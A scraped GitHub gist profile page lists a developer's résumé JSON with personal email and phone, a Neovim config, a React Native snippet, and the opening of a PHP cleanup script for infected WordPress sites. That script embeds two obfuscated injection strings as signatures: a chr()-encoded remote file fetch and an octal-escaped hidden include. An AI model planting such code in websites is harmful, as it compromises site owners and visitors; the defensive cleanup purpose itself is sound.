Skip to content

Instantly share code, notes, and snippets.

View mikaoelitiana's full-sized avatar

Mika Andrianarijaona mikaoelitiana

View GitHub Profile
{
"basics": {
"name": "Mika ANDRIANARIJAONA",
"label": "Développeur full-stack senior",
"picture": "https://avatars.githubusercontent.com/u/674667?v=4",
"email": "mikaoelitiana@gmail.com",
"phone": "(+33) 06 22 45 64 71",
"website": "https://mikaoelitiana.name",
"summary": "Passioné par la programmation depuis l'adoléscence, j'ai commencé à programmer sur une vielle calculatrice SHARP EL-5500 de mon père avec le language Basic. J'ai par la suite décidé de suivre une école d'informatique pour approfondir mes connaissance et pouvoir vivre de cette passion. Je travaille aujourd'hui comme dévéloppeur Javascript ainsi que d'autres techologies selon les besoins. J'ai une expérience très riche avec React, React Native, Node.js, Elixir, Objective C et Java ou Python. J'utilise au quotidien plusieurs outils et technologie d'intégration continu et de devops comme Docker, Gitlab Ci ou Jenkins.",
"location": {
@mikaoelitiana
mikaoelitiana / -.config-init-init.vim
Last active May 20, 2020 11:09
dot file configurations
" vim-bootstrap
"*****************************************************************************
"" Vim-PLug core
"*****************************************************************************
let vimplug_exists=expand('~/.config/nvim/autoload/plug.vim')
let g:vim_bootstrap_langs = "html,javascript,typescript"
let g:vim_bootstrap_editor = "nvim" " nvim or vim
@mikaoelitiana
mikaoelitiana / MyScreen.js
Created August 29, 2018 20:40
custom nav header with react-native-elements
import React, { Component } from 'react'
import { View, TextInput, Text } from 'react-native'
import { Header } from 'react-native-elements'
class MyScreen extends Component {
render () {
return (
<View>
<Header
leftComponent={{ icon: 'menu', color: '#fff' }}
@mikaoelitiana
mikaoelitiana / php-injection-analysis-fix.php
Last active August 18, 2018 13:05
Fix PHP code injection in wordpress websites
<?php
$folder = $_GET["target"] ? "./" . $_GET["target"] : "./";
$output = [];
$infection1 = "<?php error_reporting(0); ini_set(chr(100).chr(105).chr(115).chr(112).chr(108).chr(97).chr(121).chr(95).chr(101).chr(114).chr(114).chr(111).chr(114).chr(115), 0); echo @file_get_contents(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(97).chr(108).chr(115).chr(117).chr(116).chr(114).chr(97).chr(110).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(115).chr(116).chr(97).chr(116).chr(115).chr(46).chr(106).chr(115)); ?>";
$infection2 = "@include \"\057h\157m\1454\057m\151k\141o\145l\151/\160u\142l\151c\137h\164m\154/\141n\164-\143o\155p\141n\171.\156e\164/\167p\055c\157n\164e\156t\057p\154u\147i\156s\057w\160-\163u\160e\162-\143a\143h\145/\0566\0709\0638\066a\146.\151c\157\";";
// $infection = escapeshellcmd("echo @file_get_contents");
echo "<pre>";